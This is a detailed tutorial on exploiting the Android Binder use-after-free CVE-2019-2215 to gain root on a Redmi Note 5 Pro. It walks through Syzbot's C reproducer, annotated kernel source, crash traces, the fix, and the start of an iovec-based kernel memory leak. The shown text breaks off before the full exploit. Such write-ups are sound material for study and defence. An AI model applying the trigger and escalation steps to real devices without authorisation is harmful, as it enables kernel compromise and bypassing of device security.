Exploit CVE-2019-2215 vulnerability to gain root access on the Redmi Note 5 Pro (whyred) and others 

Posted on: Aug 23, 2020 9:52 PM UTC

In this article, I will show you how to exploit the CVE-2019-2215 vulnerability to gain root access on the Redmi Note 5 Pro (whyred) and other devices.
There are already good articles about this exploit, but I'm writing this one for three reasons:
  • the existing ones can be a bit hard to follow for newcomers
  • they didn't work on the Redmi Note 5 Pro
  • I want to give step-by-step explanations of the whole process
Here I will reformulate in hopefully simpler terms, but the articles in the references section are really worth reading.
My goal here is to allow any person motivated enough to fully understand this exploit. And if they manage to root their device along the way, that's even better.

Remarks

This article is quite long and technical, and I may have left some errors in it.
I have done my best to keep it understandable; this includes leaving the error checks out of the code excerpts in the article, but you will find them in the full code on Github.
I also skipped certain parts and explanations that were not essential or explained elsewhere.
Just tell me if anything seems off to you.

What is CVE-2019-2215?

You can find a description of CVE-2019-2215 on the NIST website:
A use-after-free in binder.c allows an elevation of privilege from an application to the Linux Kernel.
No user interaction is required to exploit this vulnerability, however exploitation does require either the installation of a malicious local application or a separate vulnerability in a network facing application.
Below are short explanations to understand these sentences.
use-after-free (UAF):
An object is allocated, used and finally freed (see memory allocation).
But a reference to a part of it still exists somewhere and is used to access it afterwards.
binder.c:
Binder is a Linux kernel component used in Android, among other things to send messages between processes.
elevation of privilege from an application to the Linux Kernel:
With no special rights you can gain kernel access.
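To make the use-after-free pattern concrete, here is a deliberately buggy user-space sketch (nothing kernel- or Binder-specific, just the general shape of the bug):

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
	char *buf = malloc(16); // allocate
	strcpy(buf, "hello");   // use
	free(buf);              // free
	// `buf` still holds the old address: dereferencing it now is a
	// use-after-free, i.e. undefined behavior (this is the bug).
	printf("%s\n", buf);    // use after free
	return 0;
}
```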
The bug was first discovered by Syzbot (a syzkaller instance, i.e. a bot that digs for Linux kernel bugs) in November 2017.
It was then fixed in February 2018, but was not included in an Android monthly security bulletin until the October 2019 one.
This article is divided into 6 parts:
  • understand the vulnerability
  • leak kernel data
  • perform an arbitrary kernel write
  • perform an arbitrary kernel read without overwriting addr_limit
  • become root and disable the security
  • apply the exploit on the Redmi Note 5 Pro and how to port it to other phones

Understand the vulnerability

Binder and Epoll

Binder

Binder is a rewrite of OpenBinder by Google and is used in Android to send messages between processes and other things we don't really need to address here.
You will find good resources on Binder here.
A binder_thread is a structure representing your thread in the Binder driver.
For reference, below is the definition of the binder_thread structure for my kernel.
My kernel is 4.4.78-perf+ so I downloaded the Android kernel source code, went to the 4.4.78 version and quickly found it.
linux/drivers/android/binder.c
```c
struct binder_thread {
	struct binder_proc *proc;
	struct rb_node rb_node;
	struct list_head waiting_thread_node;
	int pid;
	int looper;
	bool looper_need_return;
	struct binder_transaction *transaction_stack;
	struct list_head todo;
	struct binder_error return_error;
	struct binder_error reply_error;
	wait_queue_head_t wait;
	struct binder_stats stats;
	atomic_t tmp_ref;
	bool is_dead;
	struct task_struct *task;
};
```

Epoll

Wikipedia describes it well:
Epoll is a Linux kernel system call for a scalable I/O event notification mechanism.
Its function is to monitor multiple file descriptors to see whether I/O is possible on any of them.
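If you have never used it, a minimal example (unrelated to the exploit) looks like this: we watch the read end of a pipe, and epoll_wait reports it as readable once a byte has been written to it.

```c
#include <stdio.h>
#include <sys/epoll.h>
#include <unistd.h>

int main(void) {
	int pipefd[2];
	pipe(pipefd);
	write(pipefd[1], "x", 1); // make the read end readable

	int epfd = epoll_create1(0); // create the epoll instance
	struct epoll_event ev = { .events = EPOLLIN };
	epoll_ctl(epfd, EPOLL_CTL_ADD, pipefd[0], &ev); // watch the read end
	struct epoll_event ready;
	int n = epoll_wait(epfd, &ready, 1, 1000); // wait up to 1 second
	printf("%d file descriptor(s) ready\n", n); // prints 1
	return 0;
}
```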

What did Syzbot do in November 2017?

Syzbot triggered a bug in November 2017, but didn't manage to create a "reproducer", i.e. a piece of code that reproduces the behavior:
Unfortunately, I don't have any reproducer for this bug yet.
It managed to do so two weeks later, and its email announcing the reproducer gives four important pieces of information.
Note: I deleted some KASAN-related lines.
  1. The memory allocation call stack
```
Allocated by task 3086:
  kmem_cache_alloc_trace+0x136/0x750 mm/slab.c:3613
  kmalloc include/linux/slab.h:499 [inline]
  kzalloc include/linux/slab.h:688 [inline]
  binder_get_thread+0x1cf/0x870 drivers/android/binder.c:4184
  binder_poll+0x8c/0x390 drivers/android/binder.c:4286
  ep_item_poll.isra.10+0xec/0x320 fs/eventpoll.c:884
  ep_insert+0x6a3/0x1b10 fs/eventpoll.c:1455
  SYSC_epoll_ctl fs/eventpoll.c:2106 [inline]
  SyS_epoll_ctl+0x12e4/0x1ab0 fs/eventpoll.c:1992
  do_syscall_32_irqs_on arch/x86/entry/common.c:327 [inline]
  do_fast_syscall_32+0x3ee/0xf9d arch/x86/entry/common.c:389
  entry_SYSENTER_compat+0x51/0x60 arch/x86/entry/entry_64_compat.S:125
```
  2. The memory release call stack
```
Freed by task 3086:
  __cache_free mm/slab.c:3491 [inline]
  kfree+0xca/0x250 mm/slab.c:3806
  binder_free_thread drivers/android/binder.c:4211 [inline]
  binder_thread_dec_tmpref+0x27f/0x310 drivers/android/binder.c:1808
  binder_thread_release+0x27d/0x540 drivers/android/binder.c:4275
  binder_ioctl+0xc05/0x141a drivers/android/binder.c:4492
  C_SYSC_ioctl fs/compat_ioctl.c:1473 [inline]
  compat_SyS_ioctl+0x151/0x2a30 fs/compat_ioctl.c:1419
  do_syscall_32_irqs_on arch/x86/entry/common.c:327 [inline]
  do_fast_syscall_32+0x3ee/0xf9d arch/x86/entry/common.c:389
  entry_SYSENTER_compat+0x51/0x60 arch/x86/entry/entry_64_compat.S:125
```
  3. The call trace of the bug
```
Call Trace:
  __lock_acquire+0x465e/0x47f0 kernel/locking/lockdep.c:3378
  lock_acquire+0x1d5/0x580 kernel/locking/lockdep.c:4004
  __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:110 [inline]
  _raw_spin_lock_irqsave+0x96/0xc0 kernel/locking/spinlock.c:159
  remove_wait_queue+0x81/0x350 kernel/sched/wait.c:50
  ep_remove_wait_queue fs/eventpoll.c:595 [inline]
  ep_unregister_pollwait.isra.7+0x18c/0x590 fs/eventpoll.c:613
  ep_free+0x13f/0x320 fs/eventpoll.c:830
  ep_eventpoll_release+0x44/0x60 fs/eventpoll.c:862
  __fput+0x333/0x7f0 fs/file_table.c:210
  ____fput+0x15/0x20 fs/file_table.c:244
  task_work_run+0x199/0x270 kernel/task_work.c:113
  exit_task_work include/linux/task_work.h:22 [inline]
  do_exit+0x9bb/0x1ae0 kernel/exit.c:865
  do_group_exit+0x149/0x400 kernel/exit.c:968
  SYSC_exit_group kernel/exit.c:979 [inline]
  SyS_exit_group+0x1d/0x20 kernel/exit.c:977
  do_syscall_32_irqs_on arch/x86/entry/common.c:327 [inline]
  do_fast_syscall_32+0x3ee/0xf9d arch/x86/entry/common.c:389
  entry_SYSENTER_compat+0x51/0x60 arch/x86/entry/entry_64_compat.S:125
```
  4. The C reproducer
reproducer1.c
```c
// ...
long r[8];

void loop() {
	memset(r, -1, sizeof(r));
	r[0] = syscall(__NR_mmap, 0x20000000ul, 0xfff000ul, 0x3ul, 0x32ul,
	               0xfffffffffffffffful, 0x0ul);
	memcpy((void*)0x20001000, "\x2f\x64\x65\x76\x2f\x62\x69\x6e\x64\x65\x72\x23\x00", 13);
	r[2] = syz_open_dev(0x20001000ul, 0x0ul, 0x0ul);
	r[3] = syscall(__NR_epoll_create, 0x10001ul);
	*(uint32_t*)0x20336ff4 = (uint32_t)0x2019;
	*(uint64_t*)0x20336ff8 = (uint64_t)0x0;
	r[6] = syscall(__NR_epoll_ctl, r[3], 0x1ul, r[2], 0x20336ff4ul);
	r[7] = syscall(__NR_ioctl, r[2], 0x40046208ul, 0x0ul);
}

int main() {
	loop();
	return 0;
}
```
Using sys/mman.h, man mmap, man epoll_ctl, include/uapi/linux/eventpoll.h and the ioctl defines, this code can be rewritten as follows (remember Syzbot is a fuzzer):
reproducer2.c
```c
#define BINDER_THREAD_EXIT 0x40046208

int main() {
	struct epoll_event event = {
		.events = EPOLLRDHUP | EPOLLHUP | EPOLLERR | EPOLLIN,
		.data.ptr = NULL
	};
	int binder_fd = open("/dev/binder", O_RDONLY);
	int epfd = epoll_create(0x10001); // useless parameter, see `man epoll_create`
	epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event);
	ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
	return 0;
}
```

Explanations of the bug

Let's understand what Syzbot did.
  1. Set the system up
  • open the binder driver
  • create an epoll instance
  2. The memory allocation
  • add the binder file descriptor to the epoll instance
reproducer2.c
```c
epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event);
```
linux/fs/eventpoll.c
```c
SYSCALL_DEFINE4(epoll_ctl, int, epfd, int, op, int, fd,
		struct epoll_event __user *, event)
{
	//...
	case EPOLL_CTL_ADD:
		if (!epi) {
			epds.events |= POLLERR | POLLHUP;
			error = ep_insert(ep, &epds, tf.file, fd, full_check);
		} else
			error = -EEXIST;
		if (full_check)
			clear_tfile_check_list();
		break;
	//...
}
```
In ep_insert there are two interesting things:
  • set ep_ptable_queue_proc as the callback used when the wait queue is added
    This is done with the init_poll_funcptr call and this puts ep_ptable_queue_proc in the _qproc member of the poll table
  • poll the binder driver using ep_item_poll which actually calls binder_poll behind the scenes, using the binder file descriptor previously obtained
linux/fs/eventpoll.c
```c
/*
 * Must be called with "mtx" held.
 */
static int ep_insert(struct eventpoll *ep, struct epoll_event *event,
		     struct file *tfile, int fd, int full_check)
{
	//...
	struct ep_pqueue epq;
	//...
	/* Initialize the poll table using the queue callback */
	epq.epi = epi;
	init_poll_funcptr(&epq.pt, ep_ptable_queue_proc);

	/*
	 * Attach the item to the poll hooks and get current event bits.
	 * We can safely use the file* here because its usage count has
	 * been increased by the caller of this function. Note that after
	 * this operation completes, the poll callback can start hitting
	 * the new item.
	 */
	revents = ep_item_poll(epi, &epq.pt);
	//...
}
```
linux/include/linux/poll.h
```c
static inline void init_poll_funcptr(poll_table *pt, poll_queue_proc qproc)
{
	pt->_qproc = qproc;
	pt->_key   = ~0UL; /* all events enabled */
}
```
The binder_poll function does two things:
  • get a reference to the binder thread using thread = binder_get_thread(proc)
The object may not have been created yet though; it is binder_get_thread's role to allocate it if needed.
linux/drivers/android/binder.c
```c
static unsigned int binder_poll(struct file *filp,
				struct poll_table_struct *wait)
{
	struct binder_proc *proc = filp->private_data;
	struct binder_thread *thread = NULL;
	bool wait_for_proc_work;

	thread = binder_get_thread(proc); // <-- get `binder_thread` reference

	binder_inner_proc_lock(thread->proc);
	thread->looper |= BINDER_LOOPER_STATE_POLL;
	wait_for_proc_work = binder_available_for_proc_work_ilocked(thread);
	binder_inner_proc_unlock(thread->proc);

	if (binder_has_work(thread, wait_for_proc_work))
		return POLLIN;

	poll_wait(filp, &thread->wait, wait); // <-- poll the queue

	if (binder_has_thread_work(thread))
		return POLLIN;

	return 0;
}
```
linux/drivers/android/binder.c
```c
static struct binder_thread *binder_get_thread(struct binder_proc *proc)
{
	struct binder_thread *thread;
	struct binder_thread *new_thread;

	binder_inner_proc_lock(proc);
	thread = binder_get_thread_ilocked(proc, NULL);
	binder_inner_proc_unlock(proc);
	if (!thread) {
		new_thread = kzalloc(sizeof(*thread), GFP_KERNEL); // <-- `binder_thread` allocation
		if (new_thread == NULL)
			return NULL;
		binder_inner_proc_lock(proc);
		thread = binder_get_thread_ilocked(proc, new_thread);
		binder_inner_proc_unlock(proc);
		if (thread != new_thread)
			kfree(new_thread);
	}
	return thread;
}
```
The second thing that binder_poll does is polling the queue with the poll_wait call.
linux/include/linux/poll.h
```c
static inline void poll_wait(struct file *filp, wait_queue_head_t *wait_address,
			     poll_table *p)
{
	if (p && p->_qproc && wait_address)
		p->_qproc(filp, wait_address, p); // <-- p->_qproc has been set to
						  // `ep_ptable_queue_proc` in `ep_insert`
}
```
linux/fs/eventpoll.c
```c
/*
 * This is the callback that is used to add our wait queue to the
 * target file wakeup lists.
 */
static void ep_ptable_queue_proc(struct file *file, wait_queue_head_t *whead,
				 poll_table *pt)
{
	struct epitem *epi = ep_item_from_epqueue(pt);
	struct eppoll_entry *pwq;

	if (epi->nwait >= 0 && (pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL))) {
		init_waitqueue_func_entry(&pwq->wait, ep_poll_callback);
		pwq->whead = whead;
		pwq->base = epi;
		add_wait_queue(whead, &pwq->wait);
		list_add_tail(&pwq->llink, &epi->pwqlist);
		epi->nwait++;
	} else {
		/* We have to signal that an error occurred */
		epi->nwait = -1;
	}
}
```
linux/include/linux/wait.h
```c
static inline void __add_wait_queue(wait_queue_head_t *head, wait_queue_t *new)
{
	list_add(&new->task_list, &head->task_list);
}
```
linux/include/linux/list.h
```c
/**
 * list_add - add a new entry
 * @new: new entry to be added
 * @head: list head to add it after
 *
 * Insert a new entry after the specified head.
 * This is good for implementing stacks.
 */
static inline void list_add(struct list_head *new, struct list_head *head)
{
	__list_add(new, head, head->next);
}
```
linux/include/linux/list.h
```c
/*
 * Insert a new entry between two known consecutive entries.
 *
 * This is only for internal list manipulation where we know
 * the prev/next entries already!
 */
#ifndef CONFIG_DEBUG_LIST
static inline void __list_add(struct list_head *new,
			      struct list_head *prev,
			      struct list_head *next)
{
	next->prev = new;
	new->next = next;
	new->prev = prev;
	prev->next = new;
}
#else
extern void __list_add(struct list_head *new,
		       struct list_head *prev,
		       struct list_head *next);
#endif
```
linux/fs/eventpoll.c
```c
struct eppoll_entry {
	/* List header used to link this structure to the "struct epitem" */
	struct list_head llink;

	/* The "base" pointer is set to the container "struct epitem" */
	struct epitem *base;

	/*
	 * Wait queue item that will be linked to the target file wait
	 * queue head.
	 */
	wait_queue_t wait;

	/* The wait queue head that linked the "wait" wait queue item */
	wait_queue_head_t *whead;
};
```
So finally the parts of the allocation process we are interested in are the following:
```c
// allocation of binder_thread
thread = kzalloc(sizeof(*thread), GFP_KERNEL);

// poll the wait queue...
ep_ptable_queue_proc(_, &thread->wait, _);
//     |
//     v
// ...which creates an eppoll_entry and fills it
pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL);
pwq->whead = &thread->wait;
list_add(&pwq->wait.task_list, &pwq->whead->task_list);
```
  3. The memory release
As a reminder, here is the memory release stack:
```
  kfree+0xca/0x250 mm/slab.c:3806
  binder_free_thread drivers/android/binder.c:4211 [inline]
  binder_thread_dec_tmpref+0x27f/0x310 drivers/android/binder.c:1808
  binder_thread_release+0x27d/0x540 drivers/android/binder.c:4275
  binder_ioctl+0xc05/0x141a drivers/android/binder.c:4492
```
The first binder function in the stack is binder_ioctl, which directly comes from the reproducer ioctl call.
The rest is straightforward:
reproducer2.c
ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
linux/drivers/android/binder.c
```c
static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
	//...
	case BINDER_THREAD_EXIT:
		binder_thread_release(proc, thread);
		thread = NULL;
		break;
	//...
}
```
linux/drivers/android/binder.c
```c
static int binder_thread_release(struct binder_proc *proc,
				 struct binder_thread *thread)
{
	//...
	binder_release_work(proc, &thread->todo);
	binder_thread_dec_tmpref(thread);
	return active_transactions;
	//...
}
```
linux/drivers/android/binder.c
```c
static void binder_thread_dec_tmpref(struct binder_thread *thread)
{
	binder_inner_proc_lock(thread->proc);
	atomic_dec(&thread->tmp_ref);
	if (thread->is_dead && !atomic_read(&thread->tmp_ref)) {
		binder_inner_proc_unlock(thread->proc);
		binder_free_thread(thread);
		return;
	}
	binder_inner_proc_unlock(thread->proc);
}
```
linux/drivers/android/binder.c
```c
static void binder_free_thread(struct binder_thread *thread)
{
	BUG_ON(!list_empty(&thread->todo));
	binder_stats_deleted(BINDER_STAT_THREAD);
	binder_proc_dec_tmpref(thread->proc);
	put_task_struct(thread->task);
	kfree(thread);
}
```
After this kfree call, the binder_thread memory is freed.
In order to have the structure in mind, here is what we just freed:
| `thread +` | +0x0 | +0x8 |
|------------|------|------|
| 0x000      | ···  | ···  |
| 0x0a0      | `wait_queue_head_t wait` (spans +0x0a0 – +0x0b7) | |
| 0x0b0      |      |      |
| ···        | ···  | ···  |
| 0x190      | `struct task_struct *task` | |

*Memory footprint of the `binder_thread` object*
  4. The use-after-free bug
What Syzbot reported was a use-after-free (UAF), i.e. an access to a memory area previously freed, here the binder_thread object.
The trace of the UAF:
```
_raw_spin_lock_irqsave+0x96/0xc0 kernel/locking/spinlock.c:159
remove_wait_queue+0x81/0x350 kernel/sched/wait.c:50
ep_remove_wait_queue fs/eventpoll.c:595 [inline]
ep_unregister_pollwait.isra.7+0x18c/0x590 fs/eventpoll.c:613
ep_free+0x13f/0x320 fs/eventpoll.c:830
ep_eventpoll_release+0x44/0x60 fs/eventpoll.c:862
...
SyS_exit_group+0x1d/0x20 kernel/exit.c:977
```
At the end of the program, SyS_exit_group is called to exit the threads, which implies releasing the event poll; this is done in ep_eventpoll_release.
linux/fs/eventpoll.c
```c
static int ep_eventpoll_release(struct inode *inode, struct file *file)
{
	struct eventpoll *ep = file->private_data;

	if (ep)
		ep_free(ep);

	return 0;
}
```
linux/fs/eventpoll.c
```c
static void ep_free(struct eventpoll *ep)
{
	// ...
	/*
	 * Walks through the whole tree by unregistering poll callbacks.
	 */
	for (rbp = rb_first(&ep->rbr); rbp; rbp = rb_next(rbp)) {
		epi = rb_entry(rbp, struct epitem, rbn);

		ep_unregister_pollwait(ep, epi);
		cond_resched();
	}
	// ...
}
```
linux/fs/eventpoll.c
```c
/*
 * This function unregisters poll callbacks from the associated file
 * descriptor. Must be called with "mtx" held (or "epmutex" if called from
 * ep_free).
 */
static void ep_unregister_pollwait(struct eventpoll *ep, struct epitem *epi)
{
	struct list_head *lsthead = &epi->pwqlist;
	struct eppoll_entry *pwq;

	while (!list_empty(lsthead)) {
		pwq = list_first_entry(lsthead, struct eppoll_entry, llink);

		list_del(&pwq->llink);
		ep_remove_wait_queue(pwq);
		kmem_cache_free(pwq_cache, pwq);
	}
}
```
linux/fs/eventpoll.c
```c
static void ep_remove_wait_queue(struct eppoll_entry *pwq)
{
	wait_queue_head_t *whead;

	rcu_read_lock();
	/* If it is cleared by POLLFREE, it should be rcu-safe */
	whead = rcu_dereference(pwq->whead);
	if (whead)
		remove_wait_queue(whead, &pwq->wait);
	rcu_read_unlock();
}
```
linux/kernel/sched/wait.c
```c
void remove_wait_queue(wait_queue_head_t *q, wait_queue_t *wait)
{
	unsigned long flags;

	spin_lock_irqsave(&q->lock, flags);
	__remove_wait_queue(q, wait);
	spin_unlock_irqrestore(&q->lock, flags);
}
```
linux/include/linux/wait.h
```c
struct __wait_queue_head {
	spinlock_t		lock;
	struct list_head	task_list;
};
typedef struct __wait_queue_head wait_queue_head_t;
```
As before, here is an oversimplified pseudo-code version to better see what happens:
```c
ep_eventpoll_release(_, _);
//     |
//     v
ep_free(ep);
//     |
//     v
ep_unregister_pollwait(ep, epi);
//     |
//     v
ep_remove_wait_queue(pwq); // pwq is an eppoll_entry
//     |
//     v
remove_wait_queue(pwq->whead, &pwq->wait);
//     |
//     v
spin_lock_irqsave(&pwq->whead->lock, _);
```
Ok, so this spin_lock_irqsave call is where the UAF happens.
This function tries to acquire a lock at address &pwq->whead->lock.
Now let's find its value to understand the problem.
In the earlier allocation chapter, we found where the eppoll_entry was created by Syzbot's reproducer:
```c
// `binder_thread` allocation
thread = kzalloc(sizeof(*thread), GFP_KERNEL);

// `eppoll_entry` allocation
pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL);

// set the `whead` value to &thread->wait
pwq->whead = &thread->wait;
```
So the spin_lock_irqsave call is actually equivalent to:
```c
spin_lock_irqsave(&thread->wait.lock, _);
```
| `thread +` | +0x0 | +0x8 |
|------------|------|------|
| 0x000      | ···  | ···  |
| 0x0a0      | `spinlock_t lock` | `struct list_head task_list` (first half: `next`) |
| 0x0b0      | `struct list_head task_list` (second half: `prev`) | |
| ···        | ···  | ···  |
| 0x190      | `struct task_struct *task` | |

*Memory footprint of the `binder_thread` object*
Using the memory table, we can see it uses the address thread + 0xa0, which has been freed in the BINDER_THREAD_EXIT ioctl call above.
Reading this freed memory is what triggers the KASAN crash.
The patch applied shortly after the Syzbot discovery adds a few lines to binder_thread_release that wake the wait queue up with POLLFREE, so that epoll detaches from it:
```diff
diff --git a/drivers/android/binder.c b/drivers/android/binder.c
index 778caed570c6..26a66da72f02 100644
--- a/drivers/android/binder.c
+++ b/drivers/android/binder.c
@@ -4365,6 +4365,18 @@  static int binder_thread_release(struct binder_proc *proc,
    if (t)
      spin_lock(&t->lock);
  }
+
+ /*
+  * If this thread used poll, make sure we remove the waitqueue
+  * from any epoll data structures holding it with POLLFREE.
+  * waitqueue_active() is safe to use here because we're holding
+  * the inner lock.
+  */
+ if ((thread->looper & BINDER_LOOPER_STATE_POLL) &&
+     waitqueue_active(&thread->wait)) {
+   wake_up_poll(&thread->wait, POLLHUP | POLLFREE);
+ }
+
  binder_inner_proc_unlock(thread->proc);
 
  if (send_reply)
```

Leaking some data

The program only crashes because KASAN is active; detecting such accesses is precisely its role. On normal Linux builds this would likely go unnoticed.
Let's see what happens on a normal build.
Instead of crashing, spin_lock_irqsave would simply try to acquire the lock.
The CPU would wait until the value at thread + 0xa0 is 0 (if it is not already), and then everything would continue normally.
linux/kernel/sched/wait.c
```c
void remove_wait_queue(wait_queue_head_t *q, wait_queue_t *wait)
{
	unsigned long flags;

	spin_lock_irqsave(&q->lock, flags);
	__remove_wait_queue(q, wait);
	spin_unlock_irqrestore(&q->lock, flags);
}
```
The next call is __remove_wait_queue:
linux/include/linux/wait.h
```c
static inline void __remove_wait_queue(wait_queue_head_t *head, wait_queue_t *old)
{
	list_del(&old->task_list);
}
```
linux/include/linux/list.h
```c
#ifndef CONFIG_DEBUG_LIST
static inline void list_del(struct list_head *entry)
{
	__list_del(entry->prev, entry->next);
	entry->next = LIST_POISON1;
	entry->prev = LIST_POISON2;
}
#else
extern void list_del(struct list_head *entry); // <-- if CONFIG_DEBUG_LIST is defined,
                                               //     `list_del` is defined somewhere else
#endif
```
linux/include/linux/list.h
```c
/*
 * Delete a list entry by making the prev/next entries
 * point to each other.
 *
 * This is only for internal list manipulation where we know
 * the prev/next entries already!
 */
static inline void __list_del(struct list_head *prev, struct list_head *next)
{
	next->prev = prev;
	WRITE_ONCE(prev->next, next);
}
```
And once __remove_wait_queue is done, you can check that there is nothing much left to be executed in ep_eventpoll_release.
I am again writing an oversimplified version of the allocation and of what is executed after the lock is acquired.
```c
// allocation of binder_thread
thread = kzalloc(sizeof(*thread), GFP_KERNEL);
// let's call thread->wait.task_list TWTL
// TWTL only has one element: "itself"
thread->wait.task_list.next = &thread->wait.task_list; // TWTL.next = &TWTL
thread->wait.task_list.prev = &thread->wait.task_list; // TWTL.prev = &TWTL

// poll the wait queue...
ep_ptable_queue_proc(_, &thread->wait, _);
//     |
//     v
// ...which creates an eppoll_entry and fills it
pwq = kmem_cache_alloc(pwq_cache, GFP_KERNEL);
pwq->wait.private = NULL;
pwq->wait.flags = 0;
pwq->wait.func = ep_poll_callback;
// the queue head is the `wait` queue head of `binder_thread`
pwq->whead = &thread->wait;
// then the epoll entry's task_list (PWTL) is added into TWTL
// from TWTL -> TWTL
// to   TWTL -> PWTL -> TWTL
thread->wait.task_list.next->prev = &pwq->wait.task_list; // TWTL.next->prev = &PWTL
                                                          // (so TWTL.prev = &PWTL)
pwq->wait.task_list.next = thread->wait.task_list.next;   // PWTL.next = TWTL.next
                                                          // (so PWTL.next = &TWTL)
pwq->wait.task_list.prev = &thread->wait.task_list;       // PWTL.prev = &TWTL
thread->wait.task_list.next = &pwq->wait.task_list;       // TWTL.next = &PWTL

/**********************************/
// End of allocation
/**********************************/
// Start of the `ep_unregister_pollwait` call
/**********************************/

// some cleaning we saw previously
remove_wait_queue(_, &pwq->wait);
//     |
//     v
__remove_wait_queue(_, &pwq->wait);
//     |
//     v
list_del(&pwq->wait.task_list);
//     |
//     v
pwq->wait.task_list.next->prev = pwq->wait.task_list.prev; // PWTL.next->prev = PWTL.prev
pwq->wait.task_list.prev->next = pwq->wait.task_list.next; // PWTL.prev->next = PWTL.next
pwq->wait.task_list.next = LIST_POISON1; // poisoning PWTL, don't care
pwq->wait.task_list.prev = LIST_POISON2; // poisoning PWTL, don't care
//     |
//     v
// but we know that PWTL.next = &TWTL and PWTL.prev = &TWTL,
// which actually gives us:
//   TWTL.prev = &TWTL;
//   TWTL.next = &TWTL;
// as expected, since we only deleted one of the two elements of the list
```
In case not everything makes sense, I'll draw the memory again.
| `thread +` | +0x0 | +0x8 |
|------------|------|------|
| 0x000      | ···  | ···  |
| 0x0a0      | `thread->wait.lock` | `thread->wait.task_list.next` = `&TWTL` = `thread + 0xa8` |
| 0x0b0      | `thread->wait.task_list.prev` = `&TWTL` = `thread + 0xa8` | |
| ···        | ···  | ···  |
| 0x190      | `struct task_struct *task` | |

*After the `binder_thread` kzalloc*

| `thread +` | +0x0 | +0x8 |
|------------|------|------|
| 0x000      | ···  | ···  |
| 0x0a0      | `thread->wait.lock` | `thread->wait.task_list.next` = `&PWTL` |
| 0x0b0      | `thread->wait.task_list.prev` = `&PWTL` | |
| ···        | ···  | ···  |
| 0x190      | `struct task_struct *task` | |

*After the epoll initialization*

| `thread +` | +0x0 | +0x8 |
|------------|------|------|
| 0x000      | ···  | ···  |
| 0x0a0      | `thread->wait.lock` | `thread->wait.task_list.next` = `&TWTL` = `thread + 0xa8` |
| 0x0b0      | `thread->wait.task_list.prev` = `&TWTL` = `thread + 0xa8` | |
| ···        | ···  | ···  |
| 0x190      | `struct task_struct *task` | |

*After the ep_unregister_pollwait call*
All of this can be summed up in one sentence: when you open the binder driver, add it to an epoll instance and close the binder thread, then, provided *(thread + 0xa0) is 0, the value thread + 0xa8 is written twice into the freed memory: at thread + 0xa8 and at thread + 0xb0.

What to do with a UAF?

Now that we covered the principle of the bug and presumably triggered it, it is time to wonder what we can do with it.
A UAF allows an attacker to do many things, depending on the program and its structure.
Here we saw that we made the kernel write a kernel pointer (twice) into freed memory.
A kernel pointer is nice to have as it can give you access to some useful objects in memory.
Knowing that the kernel is leaking a kernel pointer, our goal is to get it.
First of all, the leaked data is currently sitting in freed RAM, so it may be overwritten at any time.
In order to avoid this, we make the kernel re-allocate the same spot. Of course you can't directly ask it to do that, but the kernel follows certain rules to allocate memory efficiently.
For example, if the kernel allocates a memory block with a size close to that of a recently freed one, there is a good chance it will land in the same spot.
Note that the type of memory is important here, though: if the kernel has recently freed 300 bytes of kernel memory and right after that you claim 300 bytes from user space, your allocation lives in user space and will never land in the same spot.
You have to make the kernel itself re-allocate something on top of the freed memory.
Then you need to extract the data of this kernel-allocated object to leak the data.
We will look at how this is done in Maddie Stone's Pixel 2 PoC; the method she used relies on vectored I/O.

Vectored I/O

I will directly quote Wikipedia on this one:
Vectored I/O, also known as scatter/gather I/O, is a method of input and output by which a single procedure call sequentially reads data from multiple buffers and writes it to a single data stream, or reads data from a data stream and writes it to multiple buffers, as defined in a vector of buffers.
In this process, each buffer is represented by an iovec object that simply gives a pointer to the buffer and its size.
linux/sys/uio.h
```c
struct iovec {
	void *iov_base;
	size_t iov_len;
};
```
To make things simple: you create an array of iovecs and call one of the functions working on them (e.g. writev); the kernel loads the array into its own memory and validates the addresses (e.g. to stop an unprivileged user from reading or writing kernel memory), and finally runs the operation.
The usual functions used with iovecs are writev, which gathers data from the buffers and writes it to a file descriptor, readv, which does the opposite (scatter), and recvmsg, which conveniently receives a predefined amount of data.
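As a minimal, self-contained illustration of the gather direction (unrelated to the exploit itself), here is writev collecting two user buffers into a single write:

```c
#include <stdio.h>
#include <string.h>
#include <sys/uio.h>
#include <unistd.h>

int main(void)
{
	// Two separate buffers gathered into a single write to stdout.
	char hello[] = "hello ";
	char world[] = "iovecs\n";
	struct iovec iov[2] = {
		{ .iov_base = hello, .iov_len = strlen(hello) },
		{ .iov_base = world, .iov_len = strlen(world) },
	};
	ssize_t n = writev(STDOUT_FILENO, iov, 2); // prints "hello iovecs"
	fprintf(stderr, "wrote %zd bytes\n", n);
	return 0;
}
```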

UAF + iovec

The intent is to use iovecs to leak data. The object that is re-allocated on the freed memory of the binder_thread will be the array of iovecs.
To receive data from the vectored I/O, we will use a pipe plugged into it.
To find out what to do next, let's see the memory once again and calculate some things.
```
offsetof(struct binder_thread, wait) = 0xa0
sizeof(struct iovec) = sizeof(void*) + sizeof(size_t) = 0x10
sizeof(struct binder_thread) = 0x198

sizeof(struct binder_thread) = 25 * sizeof(struct iovec) + 8
```
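These numbers can even be sanity-checked at compile time; a minimal sketch, assuming a 64-bit ABI (where both `void*` and `size_t` are 8 bytes) and C11's static_assert:

```c
#include <assert.h>
#include <sys/uio.h>

// 25 iovecs cover 25 * 0x10 = 0x190 (400) of the 0x198 (408) bytes
// of binder_thread, i.e. everything up to the final task pointer.
static_assert(sizeof(struct iovec) == 0x10, "expected a 64-bit ABI");
static_assert(25 * sizeof(struct iovec) == 0x190, "25 iovecs cover 400 bytes");
```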
| offset | `binder_thread` field | overlaid `kiovecs` field |
|--------|-----------------------|--------------------------|
| +0x000 | `struct binder_proc *proc` | `kiovecs[0].iov_base` |
| +0x008 | `struct rb_node` (first `uint64_t`) | `kiovecs[0].iov_len` |
| ···    | ···                   | ···                      |
| +0x0a0 | `thread->wait.lock`   | `kiovecs[10].iov_base`   |
| +0x0a8 | `thread->wait.task_list.next` | `kiovecs[10].iov_len` |
| +0x0b0 | `thread->wait.task_list.prev` | `kiovecs[11].iov_base` |
| +0x0b8 |                       | `kiovecs[11].iov_len`    |
| ···    | ···                   | ···                      |
